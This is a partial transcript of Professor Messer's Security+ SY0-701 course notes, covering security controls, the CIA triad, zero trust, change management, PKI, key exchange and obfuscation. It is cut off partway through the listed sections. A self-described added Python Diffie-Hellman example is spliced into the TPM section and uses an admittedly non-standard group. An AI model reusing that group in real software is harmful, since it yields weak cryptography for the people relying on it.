Professor Messer's CompTIA Security+ SY0-701 Course Notes PDF

Document Details

Uploaded by LovedOstrich3798 (University of Tripoli), 2023
Author: James "Professor" Messer
Subject: CompTIA
Tags: comptia, security, sy0-701, information technology, security

Summary

These are course notes for the CompTIA Security+ SY0-701 exam. The notes cover general security concepts, threats, vulnerabilities, security architecture, operations, and governance. They are a valuable learning resource for IT professionals preparing for the certification exam.

Full Transcript


Professor Messer’s SY0-701 CompTIA Security+ Course Notes
James “Professor” Messer
https://www.ProfessorMesser.com

Professor Messer’s SY0-701 CompTIA Security+ Course Notes
Written by James “Professor” Messer
Copyright © 2023 by Messer Studios, LLC
https://www.ProfessorMesser.com

All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without written permission from the publisher.

First Edition: October 2023
This is version 1.06

Trademark Acknowledgments
All product names and trademarks are the property of their respective owners, and are in no way associated or affiliated with Messer Studios, LLC. “Professor Messer” is a registered trademark of Messer Studios LLC. “CompTIA” and “Security+” are registered trademarks of CompTIA, Inc.

Warning and Disclaimer
This book is designed to provide information about the CompTIA SY0-701 Security+ certification exam. However, there may be typographical and/or content errors. Therefore, this book should serve only as a general guide and not as the ultimate source of subject information. The author shall have no liability or responsibility to any person or entity regarding any loss or damage incurred, or alleged to have incurred, directly or indirectly, by the information contained in this book.
Contents

1.0 - General Security Concepts 1
1.1 - Security Controls 1
1.2 - The CIA Triad 2
1.2 - Non-repudiation 3
1.2 - Authentication, Authorization, and Accounting 4
1.2 - Gap Analysis 5
1.2 - Zero Trust 5
1.2 - Physical Security 7
1.2 - Deception and Disruption 7
1.3 - Change Management 8
1.3 - Technical Change Management 9
1.4 - Public Key Infrastructure 10
1.4 - Encrypting Data 11
1.4 - Key Exchange 11
1.4 - Encryption Technologies 12
1.4 - Obfuscation 13
1.4 - Hashing and Digital Signatures 14
1.4 - Blockchain Technology 15
1.4 - Certificates 16
2.0 - Threats, Vulnerabilities, and Mitigations 18
2.1 - Threat Actors 18
2.2 - Common Threat Vectors 19
2.2 - Phishing 20
2.2 - Impersonation 21
2.2 - Watering Hole Attacks 21
2.2 - Other Social Engineering Attacks 22
2.3 - Memory Injections 22
2.3 - Buffer Overflows 23
2.3 - Race Conditions 23
2.3 - Malicious Updates 24
2.3 - Operating System Vulnerabilities 24
2.3 - SQL Injection 25
2.3 - Cross-site Scripting 25
2.3 - Hardware Vulnerabilities 26
2.3 - Virtualization Vulnerabilities 27
2.3 - Cloud-specific Vulnerabilities 27
2.3 - Supply Chain Vulnerabilities 28
2.3 - Misconfiguration Vulnerabilities 28
2.3 - Mobile Device Vulnerabilities 29
2.3 - Zero-day Vulnerabilities 29
2.4 - An Overview of Malware 30
2.4 - Viruses and Worms 30
2.4 - Spyware and Bloatware 31
2.4 - Other Malware Types 32
2.4 - Physical Attacks 32
2.4 - Denial of Service 33
2.4 - DNS Attacks 33
2.4 - Wireless Attacks 34
2.4 - On-path Attacks 34
2.4 - Replay Attacks 35
2.4 - Malicious Code 36
2.4 - Application Attacks 36
2.4 - Cryptographic Attacks 38
2.4 - Password Attacks 39
2.4 - Indicators of Compromise 39
2.5 - Segmentation and Access Control 40
2.5 - Mitigation Techniques 41
2.5 - Hardening Techniques 41
3.0 - Security Architecture 42
3.1 - Cloud Infrastructures 42
3.1 - Network Infrastructure Concepts 44
3.1 - Other Infrastructure Concepts 44
3.1 - Infrastructure Considerations 45
3.2 - Secure Infrastructures 47
3.2 - Intrusion Prevention 48
3.2 - Network Appliances 48
3.2 - Port Security 50
3.2 - Firewall Types 50
3.2 - Secure Communication 51
3.3 - Data Types and Classifications 53
3.3 - States of Data 53
3.3 - Protecting Data 54
3.4 - Resiliency 55
3.4 - Capacity Planning 56
3.4 - Recovery Testing 57
3.4 - Backups 57
3.4 - Power Resiliency 58
4.0 - Operations and Incident Response 59
4.1 - Secure Baselines 59
4.1 - Hardening Targets 59
4.1 - Securing Wireless and Mobile 60
4.1 - Wireless Security Settings 61
4.1 - Application Security 62
4.2 - Asset Management 63
4.3 - Vulnerability Scanning 64
4.3 - Threat Intelligence 65
4.3 - Penetration Testing 65
4.3 - Penetration Testing 66
4.3 - Analyzing Vulnerabilities 66
4.3 - Vulnerability Remediation 67
4.4 - Security Monitoring 68
4.4 - Security Tools 69
4.5 - Firewalls 70
4.5 - Web Filtering 71
4.5 - Operating System Security 72
4.5 - Secure Protocols 72
4.5 - Email Security 73
4.5 - Monitoring Data 73
4.5 - Endpoint Security 74
4.6 - Identity and Access Management 75
4.6 - Access Controls 77
4.6 - Multifactor Authentication 78
4.6 - Password Security 78
4.7 - Scripting and Automation 79
4.8 - Incident Response 80
4.8 - Incident Planning 81
4.8 - Digital Forensics 82
4.8 - Log Data 83
5.0 - Governance, Risk, and Compliance 84
5.1 - Security Policies 84
5.1 - Security Standards 85
5.1 - Security Procedures 86
5.1 - Security Considerations 87
5.1 - Data Roles and Responsibilities 87
5.2 - Risk Management 88
5.2 - Risk Analysis 88
5.2 - Risk Management Strategies 89
5.2 - Business Impact Analysis 89
5.3 - Third-party Risk Assessment 90
5.3 - Agreement Types 91
5.4 - Compliance 92
5.4 - Privacy 93
5.5 - Audits and Assessments 93
5.5 - Penetration Tests 94
5.6 - Security Awareness 95
5.6 - User Training 96

Introduction

Information technology security is a significant concern for every IT specialist. Our systems are under constant attack, and the next generation of security professionals will be at the forefront of keeping our critical information safe.

CompTIA’s Security+ exam tests you on the specifics of network security, vulnerabilities, threats, and much more. I’ve created these Course Notes to help you through the details that you need to know for the exam.

Best of luck with your studies!
- Professor Messer

The CompTIA Security+ certification

To earn the Security+ certification, you must pass a single SY0-701 certification exam. The exam is 90 minutes in duration and includes both multiple choice questions and performance-based questions. Performance-based questions could include fill-in-the-blank, matching, sorting, and simulated operational environments. You will need to be very familiar with the exam topics to have the best possible exam results.

Here’s the breakdown of each technology section and the percentage of each topic on the SY0-701 exam:

Section 1.0 - General Security Concepts - 12%
Section 2.0 - Threats, Vulnerabilities, and Mitigations - 22%
Section 3.0 - Security Architecture - 18%
Section 4.0 - Security Operations - 28%
Section 5.0 - Security Program Management and Oversight - 20%

CompTIA provides a detailed set of exam objectives that lists everything you need to know before you take your exam. You can find a link to the exam objectives here: https://professormesser.com/objectives/

How to use this book

Once you’re comfortable with all of the sections in the official CompTIA SY0-701 exam objectives, you can use these notes as a consolidated summary of the most important topics. These Course Notes follow the same format and numbering scheme as the official CompTIA Exam Objectives, so it should be relatively easy to cross reference these notes with the Professor Messer video series and all of your other study materials.

The CompTIA Security+ video training series can be found on the Professor Messer website at https://www.ProfessorMesser.com.
Professor Messer’s CompTIA Security+ SY0-701 Course Notes https://www.ProfessorMesser.com

1.1 - Security Controls

Security controls
Security risks are out there
– Many different categories and types to consider
Assets are also varied
– Data, physical property, computer systems
Prevent security events, minimize the impact, and limit the damage
– Security controls

Control categories
Technical controls
– Controls implemented using systems
– Operating system controls
– Firewalls, anti-virus
Managerial controls
– Administrative controls associated with security design and implementation
– Security policies, standard operating procedures
Operational controls
– Controls implemented by people instead of systems
– Security guards, awareness programs
Physical controls
– Limit physical access
– Guard shack
– Fences, locks
– Badge readers

Preventive control types
Preventive
– Block access to a resource
– You shall not pass
Prevent access
– Firewall rules
– Follow security policy
– Guard shack checks all identification
– Enable door locks

Deterrent control types
Deterrent
– Discourage an intrusion attempt
– Does not directly prevent access
Make an attacker think twice
– Application splash screens
– Threat of demotion
– Front reception desk
– Posted warning signs

Detective control types
Detective
– Identify and log an intrusion attempt
– May not prevent access
Find the issue
– Collect and review system logs
– Review login reports
– Regularly patrol the property
– Enable motion detectors

Corrective control types
Corrective
– Apply a control after an event has been detected
– Reverse the impact of an event
– Continue operating with minimal downtime
Correct the problem
– Restoring from backups can mitigate a ransomware infection
– Create policies for reporting security issues
– Contact law enforcement to manage criminal activity
– Use a fire extinguisher

Compensating control types
Compensating
– Control using other means
– Existing controls aren’t sufficient
– May be temporary
Prevent the exploitation of a weakness
– Firewall blocks a specific application instead of patching the app
– Implement a separation of duties
– Require simultaneous guard duties
– Generator used after power outage

Directive control types
Directive
– Direct a subject towards security compliance
– A relatively weak security control
Do this, please
– Store all sensitive files in a protected folder
– Create compliance policies and procedures
– Train users on proper security policy
– Post a sign for “Authorized Personnel Only”

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 1 https://ProfessorMesser.com

1.1 - Security Controls (continued)

Managing security controls
There are multiple security controls for each category and type
– Some security controls may exist in multiple types or categories
– New security controls are created as systems and processes evolve
– Some organizations will combine types
These are not inclusive lists
– There are many categories of control
– Your organization may use very different controls

1.2 - The CIA Triad

The CIA Triad
Combination of principles
– The fundamentals of security
– Sometimes referenced as the AIC Triad
Confidentiality
– Prevent disclosure of information to unauthorized individuals or systems
Integrity
– Messages can’t be modified without detection
Availability
– Systems and networks must be up and running

Confidentiality
Certain information should only be known to certain people
– Prevent unauthorized information disclosure
Encryption
– Encode messages so only certain people can read it
Access controls
– Selectively restrict access to a resource
Two-factor authentication
– Additional confirmation before information is disclosed

Integrity
Data is stored and transferred as intended
– Any modification to the data would be identified
Hashing
– Map data of an arbitrary length to data of a fixed length
Digital signatures
– Mathematical scheme to verify the integrity of data
Certificates
– Combine with a digital signature to verify an individual
Non-repudiation
– Provides proof of integrity, can be asserted to be genuine

Availability
Information is accessible to authorized users
– Always at your fingertips
Redundancy
– Build services that will always be available
Fault tolerance
– System will continue to run, even when a failure occurs
Patching
– Stability
– Close security holes

1.2 - Non-repudiation

Non-repudiation
You can’t deny what you’ve said
– There’s no taking it back
Sign a contract
– Your signature adds non-repudiation
– You really did sign the contract
– Others can see your signature
Adds a different perspective for cryptography
– Proof of integrity
– Proof of origin, with high assurance of authenticity

Proof of integrity
Verify data does not change
– The data remains accurate and consistent
In cryptography, we use a hash
– Represent data as a short string of text
– A message digest, a fingerprint
If the data changes, the hash changes
– If the person changes, you get a different fingerprint
Doesn’t necessarily associate data with an individual
– Only tells you if the data has changed

Hashing the encyclopedia
Gutenberg Encyclopedia, Vol 1, by Project Gutenberg (8.1 megabytes)
Change one character somewhere in the file
– The hash changes
If the hash is different, something has changed
– The data integrity has been compromised

Proof of origin
Prove the message was not changed
– Integrity
Prove the source of the message
– Authentication
Make sure the signature isn’t fake
– Non-repudiation
Sign with the private key
– The message doesn’t need to be encrypted
– Nobody else can sign this (obviously)
Verify with the public key
– Any change to the message will invalidate the signature

[Figure: Creating a Digital Signature. 1. Alice creates a hash of the original plaintext. 2. Alice encrypts the hash with her private key. 3. The encrypted hash (digital signature) is included with the plaintext. Shown on Alice’s computer: plaintext, hashing algorithm, hash of plaintext, Alice’s private key, encryption, digital signature.]

[Figure: Verifying a Digital Signature. 1. Bob decrypts the digital signature with Alice’s public key to obtain the plaintext hash. 2. Bob hashes the plaintext and compares it to the decrypted hash. Shown on Bob’s laptop: plaintext and digital signature, Alice’s public key, decryption, hashing algorithm, hash of plaintext.]

1.2 - Authentication, Authorization, and Accounting

AAA framework
Identification
– This is who you claim to be
– Usually your username
Authentication
– Prove you are who you say you are
– Password and other authentication factors
Authorization
– Based on your identification and authentication, what access do you have?
Accounting
– Resources used: login time, data sent and received, logout time

Authenticating systems
You have to manage many devices
– Often devices that you’ll never physically see
A system can’t type a password
– And you may not want to store one
How can you truly authenticate a device?
– Put a digitally signed certificate on the device
Other business processes rely on the certificate
– Access to the VPN from authorized devices
– Management software can validate the end device

Certificate authentication
An organization has a trusted Certificate Authority (CA)
– Most organizations maintain their own CAs
The organization creates a certificate for a device
– And digitally signs the certificate with the organization’s CA
The certificate can now be included on a device as an authentication factor
– The CA’s digital signature is used to validate the certificate

Authorization models
The user or device has now authenticated
– To what do they now have access?
– Time to apply an authorization model
Users and services -> data and applications
– Associating individual users to access rights does not scale
Put an authorization model in the middle
– Define by roles, organizations, attributes, etc.

No authorization model
A simple relationship
– User -> Resource
Some issues with this method
– Difficult to understand why an authorization may exist
– Does not scale

Using an authorization model
Add an abstraction
– Reduce complexity
– Create a clear relationship between the user and the resource
Administration is streamlined
– Easy to understand the authorizations
– Support any number of users or resources

[Figure: Using an Authorization Model.]

1.2 - Gap Analysis

Gap Analysis
Where you are compared with where you want to be
– The “gap” between the two
This may require extensive research
– There’s a lot to consider
This can take weeks or months
– An extensive study with numerous participants
– Get ready for emails, data gathering, and technical research

Choosing the framework
Work towards a known baseline
– This may be an internal set of goals
– Some organizations should use formal standards
Determine the end goal
– NIST Special Publication 800-171 Revision 2, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations
– ISO/IEC 27001, Information security management systems

Evaluate people and processes
Get a baseline of employees
– Formal experience
– Current training
– Knowledge of security policies and procedures
Examine the current processes
– Research existing IT systems
– Evaluate existing security policies

Compare and contrast
The comparison
– Evaluate existing systems
Identify weaknesses
– Along with the most effective processes
A detailed analysis
– Examine broad security categories
– Break those into smaller segments

The analysis and report
The final comparison
– Detailed baseline objectives
– A clear view of the current state
Need a path to get from the current security to the goal
– This will almost certainly include time, money, and lots of change control
Time to create the gap analysis report
– A formal description of the current state
– Recommendations for meeting the baseline

1.2 - Zero Trust

Zero trust
Many networks are relatively open on the inside
– Once you’re through the firewall, there are few security controls
Zero trust is a holistic approach to network security
– Covers every device, every process, every person
Everything must be verified
– Nothing is inherently trusted
– Multi-factor authentication, encryption, system permissions, additional firewalls, monitoring and analytics, etc.

Planes of operation
Split the network into functional planes
– Applies to both physical, virtual, and cloud components
Data plane
– Process the frames, packets, and network data
– Processing, forwarding, trunking, encrypting, NAT
Control plane
– Manages the actions of the data plane
– Define policies and rules
– Determines how packets should be forwarded
– Routing tables, session tables, NAT tables

Controlling trust
Adaptive identity
– Consider the source and the requested resources
– Multiple risk indicators - relationship to the organization, physical location, type of connection, IP address, etc.
– Make the authentication stronger, if needed
Threat scope reduction
– Decrease the number of possible entry points
Policy-driven access control
– Combine the adaptive identity with a predefined set of rules

Policy enforcement point
Subjects and systems
– End users, applications, non-human entities
Policy enforcement point (PEP)
– The gatekeeper
Allow, monitor, and terminate connections
– Can consist of multiple components working together

1.2 - Zero Trust (continued)

Applying trust in the planes
Policy Decision Point
– There’s a process for making an authentication decision
Policy Engine
– Evaluates each access decision based on policy and other information sources
– Grant, deny, or revoke
Policy Administrator
– Communicates with the Policy Enforcement Point
– Generates access tokens or credentials
– Tells the PEP to allow or disallow access

Security zones
Security is more than a one-to-one relationship
– Broad categorizations provide a security-related foundation
Where are you coming from and where are you going
– Trusted, untrusted
– Internal network, external network
– VPN 1, VPN 5, VPN 11
– Marketing, IT, Accounting, Human Resources
Using the zones may be enough by itself to deny access
– For example, Untrusted to Trusted zone traffic
Some zones are implicitly trusted
– For example, Trusted to Internal zone traffic

[Figure: Zero Trust Across Planes.]

1.2 - Physical Security

Barricades / bollards
Prevent access - there are limits to the prevention
Channel people through a specific access point
– Allow people, prevent cars and trucks
Identify safety concerns - and prevent injuries
Can be used to an extreme
– Concrete barriers / bollards, moats

Access control vestibules
All doors normally unlocked
– Opening one door causes others to lock
All doors normally locked
– Unlocking one door prevents others from being unlocked
One door open / other locked
– When one is open, the other cannot be unlocked
One at a time, controlled groups
– Managed control through an area

Fencing
Build a perimeter - usually very obvious
– May not be what you’re looking for
Transparent/opaque - see through the fence (or not)
Robust - difficult to cut the fence
Prevent climbing - razor wire - build it high

Video surveillance
CCTV (closed circuit television)
– Can replace physical guards
Camera features are important
– Motion recognition can alarm and alert
– Object detection can identify a license plate or face
Often many different cameras
– Networked together and recorded over time

Guards and access badges
Security guard
– Physical protection at the reception area of a facility
– Validates identification of existing employees
Two-person integrity/control
– Minimize exposure to an attack
– No single person has access to a physical asset
Access badge
– Picture, name, other details
– Must be worn at all times - electronically logged

Lighting
More light means more security
– Attackers avoid the light - easier to see when lit
– Non-IR cameras can see better
Specialized design
– Consider overall light levels
– Lighting angles may be important
– Important for facial recognition
– Avoid shadows and glare

Sensors
Infrared
– Detects infrared radiation in both light and dark
– Common in motion detectors
Pressure
– Detects a change in force - floor and window sensors
Microwave
– Detects movement across large areas
Ultrasonic
– Send ultrasonic signals, receive reflected sound waves
– Detect motion, collision detection, etc.

1.2 - Deception and Disruption

Honeypots
Attract the bad guys - and trap them there
– The “attacker” is probably a machine
– Makes for interesting recon
Honeypots - create a virtual world to explore
Many different options
– Most are open source and available to download
Constant battle to discern the real from the fake

Honeynets
A real network includes more than a single device
– Servers, workstations, routers, switches, firewalls
Honeynets
– Build a larger deception network with one or more honeypots
More than one source of information

Honeyfiles
Attract the attackers with more honey
– Create files with fake information
– Something bright and shiny
– Bait for the honeynet (passwords.txt)
– Add many honeyfiles to file shares
An alert is sent if the file is accessed
– A virtual bear trap

Honeytokens
Track the malicious actors
– Add some traceable data to the honeynet
– If the data is stolen, you’ll know where it came from
API credentials
– Does not actually provide access
– Notifications are sent when used
Fake email addresses
– Add it to a contact list
– Monitor the Internet to see who posts it
Many other honeytoken examples
– Database records, browser cookies, web page pixels

1.3 - Change Management

Change management
How to make a change
– Upgrade software, patch an application, change firewall configuration, modify switch ports
One of the most common risks in the enterprise
– Occurs very frequently
Often overlooked or ignored
– Did you feel that bite?
Have clear policies
– Frequency, duration, installation process, rollback procedures
Sometimes extremely difficult to implement
– It’s hard to change corporate culture

Change approval process
A formal process for managing change
– Avoid downtime, confusion, and mistakes
A typical approval process
– Complete the request forms
– Determine the purpose of the change
– Identify the scope of the change
– Schedule a date and time of the change
– Determine affected systems and the impact
– Analyze the risk associated with the change
– Get approval from the change control board
– Get end-user acceptance after the change is complete

Ownership
An individual or entity needs to make a change
– They own the process
– They don’t (usually) perform the actual change
The owner manages the process
– Process updates are provided to the owner
– Ensures the process is followed and acceptable
Address label printers need to be upgraded
– Shipping and Receiving department owns the process
– IT handles the actual change

Stakeholders
Who is impacted by this change?
– They’ll want to have input on the change management process
This may not be as obvious as you might think
– A single change can include one individual or the entire company
Upgrade software used for shipping labels
– Shipping / receiving
– Accounting reports
– Product delivery timeframes
– Revenue recognition - CEO visibility

Impact analysis
Determine a risk value
– i.e., high, medium, low
The risks can be minor or far-reaching
– The “fix” doesn’t actually fix anything
– The fix breaks something else
– Operating system failures
– Data corruption
What’s the risk with NOT making the change?
– Security vulnerability
– Application unavailability
– Unexpected downtime to other services

Test results
Sandbox testing environment
– No connection to the real world or production system
– A technological safe space
Use before making a change to production
– Try the upgrade, apply the patch
– Test and confirm before deployment
Confirm the backout plan
– Move everything back to the original
– A sandbox can’t consider every possibility

Backout plan
The change will work perfectly and nothing will ever go bad
– Of course it will
You should always have a way to revert your changes
– Prepare for the worst, hope for the best
This isn’t as easy as it sounds
– Some changes are difficult to revert
Always have backups
– Always have good backups

Maintenance window
When is the change happening?
– This might be the most difficult part of the process
During the workday may not be the best option
– Potential downtime would affect a large part of production
Overnights are often a better choice
– Challenging for 24-hour production schedules
The time of year may be a consideration
– Retail networks are frozen during the holiday season

Standard operating procedure
Change management is critical
– Affects everyone in the organization
The process must be well documented
– Should be available on the Intranet
– Along with all standard processes and procedures
Changes to the process are reflected in the standards
– A living document

1.3 - Technical Change Management

Technical change management
Put the change management process into action
– Execute the plan
There’s no such thing as a simple upgrade
– Can have many moving parts
– Separate events may be required
Change management is often concerned with “what” needs to change
– The technical team is concerned with “how” to change it

Allow list / deny list
Any application can be dangerous
– Vulnerabilities, trojan horses, malware
Security policy can control app execution
– Allow list, deny/block list
Allow list
– Nothing runs unless it’s approved
– Very restrictive
Deny list
– Nothing on the “bad list” can be executed
– Anti-virus, anti-malware

Restricted activities
The scope of a change is important
– Defines exactly which components are covered
A change approval isn’t permission to make any change
– The change control approval is very specific
The scope may need to be expanded during the change window
– It’s impossible to prepare for all possible outcomes
The change management process determines the next steps
– There are processes in place to make the change successful

Downtime
Services will eventually be unavailable
– The change process can be disruptive
– Usually scheduled during non-production hours
If possible, prevent any downtime
– Switch to secondary system, upgrade the primary, then switch back
Minimize any downtime events
– The process should be as automated as possible
– Switch back to secondary if issues appear
– Should be part of the backout plan
Send emails and calendar updates

Restarts
It’s common to require a restart
– Implement the new configuration
– Reboot the OS, power cycle the switch, bounce the service
– Can the system recover from a power outage?
Services
– Stop and restart the service or daemon
– May take seconds or minutes
Applications
– Close the application completely
– Launch a new application instance

Legacy applications
Some applications were here before you arrived
– They’ll be here when you leave
Often no longer supported by the developer
– You’re now the support team
Fear of the unknown
– Face your fears and document the system
– It may not be as bad as you think
May be quirky
– Create specific processes and procedures
– Become the expert

Dependencies
To complete A, you must complete B
– A service will not start without other active services
– An application requires a specific library version
Modifying one component may require changing or restarting other components
– This can be challenging to manage
Dependencies may occur across systems
– Upgrade the firewall code first
– Then upgrade the firewall management software

Documentation
It can be challenging to keep up with changes
– Documentation can become outdated very quickly
– Required with the change management process
Updating diagrams
– Modifications to network configurations
– Address updates
Updating policies/procedures
– Adding new systems may require new procedures

Version control
Track changes to a file or configuration data over time
– Easily revert to a previous setting
Many opportunities to manage versions
– Router configurations
– Windows OS patches
– Application registry entries
Not always straightforward
– Some devices and operating systems provide version control features
– May require additional management software

1.4 - Public Key Infrastructure

Public Key Infrastructure (PKI)
Policies, procedures, hardware, software, people
– Digital certificates: create, distribute, manage, store, revoke
This is a big, big endeavor
– Lots of planning
Also refers to the binding of public keys to people or devices
– The certificate authority
– It’s all about trust

Symmetric encryption
A single, shared key
– Encrypt with the key
– Decrypt with the same key
– If it gets out, you’ll need another key
Secret key algorithm
– A shared secret
Doesn’t scale very well
– Can be challenging to distribute
Very fast to use
– Less overhead than asymmetric encryption
– Often combined with asymmetric encryption

Asymmetric encryption
Public key cryptography
– Two (or more) mathematically related keys
Private key
– Keep this private
Public key
– Anyone can see this key
– Give it away
The private key is the only key that can decrypt data encrypted with the public key
– You can’t derive the private key from the public key

The key pair
Asymmetric encryption
– Public key cryptography
Key generation
– Build both the public and private key at the same time
– Lots of randomization
– Large prime numbers
– Lots and lots of math
Everyone can have the public key
– Only Alice has the private key

Key escrow
Someone else holds your decryption keys
– Your private keys are in the hands of a 3rd-party
– This may be within your own organization
This can be a legitimate business arrangement
– A business might need access to employee information
– Government agencies may need to decrypt partner data
Controversial?
– Of course
– But may still be required
It’s all about the process
Need clear process and procedures
– Keys are incredibly important pieces of information
You must be able to trust your 3rd-party
– Access to the keys is at the control of the 3rd-party
Carefully controlled conditions
– Legal proceedings and court orders

[Figure: Asymmetric encryption. 1. Bob combines Alice’s public key with plaintext (“Hello, Alice”) to create ciphertext. 2. Alice uses her private key to decrypt the ciphertext into the original plaintext. Shown: Bob’s laptop, Alice’s public key, ciphertext, Alice’s computer, Alice’s private key.]

1.4 - Encrypting Data

Encrypting stored data
Protect data on storage devices
– SSD, hard drive, USB drive, cloud storage, etc.
– This is data at rest
Full-disk and partition/volume encryption
– BitLocker, FileVault, etc.
File encryption
– EFS (Encrypting File System), third-party utilities

Database encryption
Protecting stored data
– And the transmission of that data
Transparent encryption
– Encrypt all database information with a symmetric key
Record-level encryption
– Encrypt individual columns
– Use separate symmetric keys for each column

Transport encryption
Protect data traversing the network
– You’re probably doing this now
Encrypting in the application
– Browsers can communicate using HTTPS
VPN (Virtual Private Network)
– Encrypts all data transmitted over the network, regardless of the application
– Client-based VPN using SSL/TLS
– Site-to-site VPN using IPsec

Encryption algorithms
There are many, many different ways to encrypt data
– The proper “formula” must be used during encryption and decryption
Both sides decide on the algorithm before encrypting the data
– The details are often hidden from the end user
There are advantages and disadvantages between algorithms
– Security level, speed, complexity of implementation, etc.

Cryptographic keys
There’s very little that isn’t known about the cryptographic process
– The algorithm is usually a known entity
– The only thing you don’t know is the key
The key determines the output
– Encrypted data
– Hash value
– Digital signature
Keep your key private!
– It’s the only thing protecting your data

Key lengths
Larger keys tend to be more secure
– Prevent brute-force attacks
– Attackers can try every possible key combination
Symmetric encryption
– 128-bit or larger symmetric keys are common
– These numbers get larger and larger as time goes on
Asymmetric encryption
– Complex calculations of prime numbers
– Larger keys than symmetric encryption
– Common to see key lengths of 3,072 bits or larger

Key stretching
A weak key is a weak key
– By itself, it’s not very secure
Make a weak key stronger by performing multiple processes
– Hash a password. Hash the hash of the password. And continue…
– Key stretching, key strengthening
Brute force attacks would require reversing each of those hashes
– The attacker has to spend much more time, even though the key is small
1.4 - Key Exchange

Key exchange
A logistical challenge
– How do you share an encryption key across an insecure medium without physically transferring the key?
Out-of-band key exchange
– Don’t send the symmetric key over the ’net
– Telephone, courier, in-person, etc.
In-band key exchange
– It’s on the network
– Protect the key with additional encryption
– Use asymmetric encryption to deliver a symmetric key

Real-time encryption/decryption
There’s a need for fast security
– Without compromising the security part
Share a symmetric session key using asymmetric encryption
– Client encrypts a random (symmetric) key with a server’s public key
– The server decrypts this shared key and uses it to encrypt data
– This is the session key
Implement session keys carefully
– Need to be changed often (ephemeral keys)
– Need to be unpredictable

Symmetric key from asymmetric keys
Use public and private key cryptography to create a symmetric key
– Math is powerful

1.4 - Key Exchange (continued)

Symmetric key from asymmetric keys (figure)
1 Bob combines his private key with Alice’s public key to create a symmetric key
2 Alice combines her private key with Bob’s public key to create the same symmetric key

1.4 - Encryption Technologies

Trusted Platform Module (TPM)
A specification for cryptographic functions
– Cryptography hardware on a device

Key management system
All key management from one console
– Create keys for a specific service or cloud provider (SSL/TLS, SSH, etc.)
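The “symmetric key from asymmetric keys” agreement in the Key Exchange section above, worked through as an added example (this is not code from the course notes). Only the two public values are ever transmitted; each side combines its own private value with the other side’s public value and derives the same session key, which is then run through HMAC-SHA256 rather than used raw. The group (p = 2**521 - 1, g = 5), the HKDF-style salt string and the function names are assumptions made for readability: p is prime, but it is not a standardised Diffie-Hellman group, and real deployments use the RFC 7919 ffdhe groups or X25519. The other path on this page, wrapping a random session key with the server’s RSA public key, is not shown here.

```python
"""Diffie-Hellman key agreement: two key pairs, one shared symmetric key.

Added example, not from the course notes. Only the public values cross the
network; each side combines its own private exponent with the other side's
public value and arrives at the same secret. The group parameters are an
ASSUMPTION for illustration (p is prime but not a standardised DH group).
"""
import hashlib
import hmac
import secrets
from typing import Tuple

P = 2 ** 521 - 1   # Mersenne prime; illustrative modulus, not an RFC 7919 group
G = 5              # generator; illustrative
P_BYTES = (P.bit_length() + 7) // 8


def generate_keypair(p: int = P, g: int = G) -> Tuple[int, int]:
    """Private key: a random exponent. Public key: g^private mod p (safe to publish)."""
    private = secrets.randbelow(p - 3) + 2          # 2 <= private <= p - 2
    public = pow(g, private, p)
    return private, public


def shared_secret(my_private: int, their_public: int, p: int = P) -> int:
    """(g^b)^a mod p == (g^a)^b mod p: the 'math is powerful' step."""
    if not 2 <= their_public <= p - 2:              # reject 0, 1 and p-1: degenerate values an attacker could inject
        raise ValueError("invalid peer public value")
    return pow(their_public, my_private, p)


def derive_session_key(secret: int, transcript: bytes, length: int = 32) -> bytes:
    """HKDF-style extract-then-expand with HMAC-SHA256 so the raw secret is never the key.
    Mixing in the transcript (both public values) ties the key to this exchange."""
    prk = hmac.new(b"dh-example-salt", secret.to_bytes(P_BYTES, "big"), hashlib.sha256).digest()
    return hmac.new(prk, transcript + b"\x01", hashlib.sha256).digest()[:length]


def run_exchange() -> Tuple[bytes, bytes]:
    """Both sides' computations for one ephemeral exchange: returns (alice_key, bob_key)."""
    alice_private, alice_public = generate_keypair()
    bob_private, bob_public = generate_keypair()
    # Only alice_public and bob_public are transmitted; an eavesdropper sees these, p and g.
    transcript = alice_public.to_bytes(P_BYTES, "big") + bob_public.to_bytes(P_BYTES, "big")
    alice_key = derive_session_key(shared_secret(alice_private, bob_public), transcript)
    bob_key = derive_session_key(shared_secret(bob_private, alice_public), transcript)
    return alice_key, bob_key


if __name__ == "__main__":
    a, b = run_exchange()
    print("keys match:", a == b, "session key:", a.hex())
```

Run it twice and the two session keys differ: the private values are ephemeral, which is what “changed often” buys you, since a long-term key stolen later cannot be used to recover a past session key.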
1.4 - Encryption Technologies (continued)

Trusted Platform Module (TPM) (continued)
Cryptographic processor
– Random number generator, key generators
Persistent memory
– Unique keys burned in during manufacturing
Versatile memory
– Storage keys, hardware configuration information
– Securely store BitLocker keys
Password protected
– No dictionary attacks

Hardware Security Module (HSM)
Used in large environments
– Clusters, redundant power
– Securely store thousands of cryptographic keys
High-end cryptographic hardware
– Plug-in card or separate hardware device
Key backup
– Secure storage in hardware
Cryptographic accelerators
– Offload that CPU overhead from other devices

Key management system
Services are everywhere
– On-premises, cloud-based
– Many different keys for many different services
Manage all keys from a centralized manager
– Often provided as third-party software
– Separate the encryption keys from the data
– Associate keys with specific users
– Rotate keys on regular intervals
– Log key use and important events

Keeping data private
Our data is located in many different places
– Mobile phones, cloud, laptops, etc.
– The most private data is often physically closest to us
Attackers are always finding new techniques
– It’s a race to stay one step ahead
Our data is changing constantly
– How do we keep this data protected?

Secure enclave
A protected area for our secrets
– Often implemented as a hardware processor
– Isolated from the main processor
– Many different technologies and names
Provides extensive security features
– Has its own boot ROM
– Monitors the system boot process
– True random number generator
– Real-time memory encryption
– Root cryptographic keys
– Performs AES encryption in hardware
– And more…

1.4 - Obfuscation

Obfuscation
The process of making something unclear
– It’s now much more difficult to understand
But it’s not impossible to understand
– If you know how to read it
Hide information in plain sight
– Store payment information without storing a credit card number
Hide information inside of an image
– Steganography

Tokenization
Replace sensitive data with a non-sensitive placeholder
– SSN 266-12-1112 is now 691-61-8539
Common with credit card processing
– Use a temporary token during payment
– An attacker capturing the card numbers can’t use them later
This isn’t encryption or hashing
– The original data and token aren’t mathematically related
– No encryption overhead

Steganography
Greek for “concealed writing”
– Security through obscurity
Message is invisible - But it’s really there
The covertext - The container document or file
Common steganography techniques
Network based - Embed messages in TCP packets
Use an image - Embed the message in the image itself
Invisible watermarks - Yellow dots on printers

Data masking
Data obfuscation
– Hide some of the original data
Protects PII
